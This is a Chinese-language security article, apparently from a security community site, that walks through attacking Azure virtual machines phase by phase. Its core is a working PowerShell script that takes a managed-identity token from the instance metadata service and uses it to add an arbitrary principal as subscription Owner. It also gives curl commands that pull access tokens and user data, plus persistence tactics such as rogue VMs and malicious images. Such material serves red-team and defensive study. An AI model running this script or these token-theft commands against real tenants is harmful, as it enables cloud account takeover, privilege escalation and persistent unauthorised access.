微软云 VM攻防 - 网安 - 专业的网络安全产业、社区、知识平台

0x01 初始访问

1、元数据

微软云元数据以 REST API 的形式公开。它的根端点是http://169.254.169.254/metadata

微软为其 API 端点实施了一些额外的安全措施——需要特殊的标头:Metadata:true

http://169.254.169.254/metadata/versions 元数据版本，元数据功能会不时更新，但需要在访问时指定版本以保持向后兼容性http://169.254.169.254/metadata/instance?api-version=2021-05-01 实例元数据，实例元数据提供 VM 配置信息。http://169.254.169.254/metadata/attested/document?api-version=2021-05-01 认证数据，认证数据是由Microsoft签名的数据http://169.254.169.254/metadata/loadbalancer?api-version=2021-05-01 负载均衡器元数据http://169.254.169.254/metadata/scheduledevents?api-version=2020-07-01 预定活动，获取VM即将要发生的事件的信息http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ 获取访问令牌

2、凭证泄露

Azure 平台用户名密码泄露、Access token泄露

可能会存在服务帐号密钥的位置，包括：开源项目的源代码库、公共存储桶、遭破解服务的公共数据转储、电子邮件收件箱、文件共享、备份存储、临时文件系统目录

0x02 命令执行

1、添加订阅所有者

从元数据获取Azure Rest API得令牌，如果返回了一个令牌，那么你将拥有一个可使用得托管身份，然后可以利用此令牌和REST API一起使用，在Azure中执行操作。

#---------Query MetaData for SubscriptionID---------#$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId

#---------Get OAuth Token---------#$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing$content = $response.Content | ConvertFrom-Json$ArmToken = $content.access_token
#---------List Roles and Get Subscription Owner GUID---------#$roleDefs = (Invoke-WebRequest -Uri (-join('https://management.azure.com/subscriptions/',$subID,'/providers/Microsoft.Authorization/roleDefinitions?api-version=2015-07-01')) -Method GET -Headers @{ Authorization ="Bearer $ArmToken"} -UseBasicParsing).Content | ConvertFrom-Json$ownerGUID = ($roleDefs.value | ForEach-Object{ if ($_.properties.RoleName -eq 'Owner'){$_.name}})
#---------List current Subscription Owners---------#$roleAssigns = (Invoke-WebRequest -Uri (-join('https://management.azure.com/subscriptions/',$subID,'/providers/Microsoft.Authorization/roleAssignments/?api-version=2015-07-01')) -Method GET -Headers @{ Authorization ="Bearer $ArmToken"} -UseBasicParsing).content | ConvertFrom-Json$ownerList = ($roleAssigns.value.properties | where roleDefinitionId -like (-join('*',$ownerGUID,'*')) | select principalId)Write-Host "Current 'Owner' Principal IDs ("($ownerList.Count)"):"$ownerList | Out-Host

#---------Set JSON body for PUT request---------#$JSONbody = @"{    "properties": {        "roleDefinitionId": "/subscriptions/$subID/providers/Microsoft.Authorization/roleDefinitions/$ownerGUID", "principalId": "CHANGE-ME-TO-AN-ID"    }}"@
#---------Add User as a Subscription Owner---------#$fullResponse = (Invoke-WebRequest -Body $JSONbody -Uri (-join("https://management.azure.com/subscriptions/",$subID,"/providers/Microsoft.Authorization/roleAssignments/",$ownerGUID,"?api-version=2015-07-01")) -Method PUT -ContentType "application/json" -Headers @{ Authorization ="Bearer $ArmToken"} -UseBasicParsing).content | ConvertFrom-Json
#---------List updated Subscription Owners---------#$roleAssigns = (Invoke-WebRequest -Uri (-join('https://management.azure.com/subscriptions/',$subID,'/providers/Microsoft.Authorization/roleAssignments/?api-version=2015-07-01')) -Method GET -Headers @{ Authorization ="Bearer $ArmToken"} -UseBasicParsing).content | ConvertFrom-Json$ownerList = ($roleAssigns.value.properties | where roleDefinitionId -like (-join('*',$ownerGUID,'*')) | select principalId) Write-Host "Updated 'Owner' Principal IDs ("($ownerList.Count)"):"$ownerList | Out-Host

通过添加的用户即可以去管理订阅

2、服务器命令执行

在拿到控制台权限后，可以通过控制台下的运行命令功能来操作虚拟机。

3、SSH密钥泄露

0x03 权限提升

一旦我们可以访问托管身份并确认该身份的权限，我们就可以开始提升我们的权限。

身份是订阅所有者：将访客身份添加到订阅

身份是订阅贡献者：虚拟机横向移动，托管标识可以通过Azure Cli或API在其他虚拟机上执行命令

0x04 权限维持

1、新增服务器

在拿到控制台后，添加一台虚拟机作为后续渗透的跳板。

2、添加角色分配

分配角色时，必须指定一个范围。范围是访问权限适用于的资源集。在 Azure 中，可在从广义到狭义的四个级别指定范围：管理组、订阅、资源组或资源。

在顶部的“搜索”框中，搜索要授予对其的访问权限的范围。例如，搜索“管理组”、“订阅”、“资源组”或某个特定资源。

再用添加的用户去访问，可以控制该订阅下的所有资源。

3、恶意镜像

我们可以通过创建镜像功能来创建恶意镜像。

0x05 信息收集

1、元数据

微软云元数据以 REST API 的形式公开。它的根端点是http://169.254.169.254/metadata

获取实例元数据，实例元数据提供 VM 配置信息

curl -H Metadata:true http://169.254.169.254/metadata/instance?api-version=2021-05-01

获取认证数据

curl -H Metadata:true http://169.254.169.254/metadata/attested/document?api-version=2021-05-01

获取负载均衡器元数据

curl -H Metadata:true http://169.254.169.254/metadata/loadbalancer?api-version=2021-05-01

获取网络信息

curl -H Metadata:true http://169.254.169.254/metadata/instance/network/interface/0?api-version=2021-01-01

获取用户数据

curl -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text" | base64 --decode

获取访问令牌

response=$(curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s)access_token=$(echo $response | python -c 'import sys, json; print (json.load(sys.stdin)["access_token"])')echo The managed identities for Azure resources access token is $access_token

2、资源信息

通过控制台所有资源查看该账户下所有资源。

3、订阅信息

组织可以有多个订阅，订阅名称通常提供信息。

4、用户信息

0x06 横向移动

1、虚拟机横向移动

2、控制台

通过拿到弱口令或者添加用户到订阅后，登录控制台可以去控制当前订阅下其他虚拟机。

0x07 影响

1、子域名接管

当域名对应的实例销毁或者当实例重新启动后对应的公网ip发生变化，但域名还是指向原来的公网ip，此时会存在子域名被接管的风险，但是由于公网ip的随机性，此攻击的利用成本较大。

0x08 总结

整体而言，微软云VM下的攻击手法主要还是由于凭证泄露、配置错误这类问题导致的。

0x09 参考

https://docs.azure.cn/zh-cn/virtual-machines/windows/instance-metadata-service?tabs=linux
https://docs.azure.cn/zh-cn/active-directory/managed-identities-azure-resources/how-to-use-vm-token
https://docs.microsoft.com/zh-cn/azure/virtual-machines/linux/run-command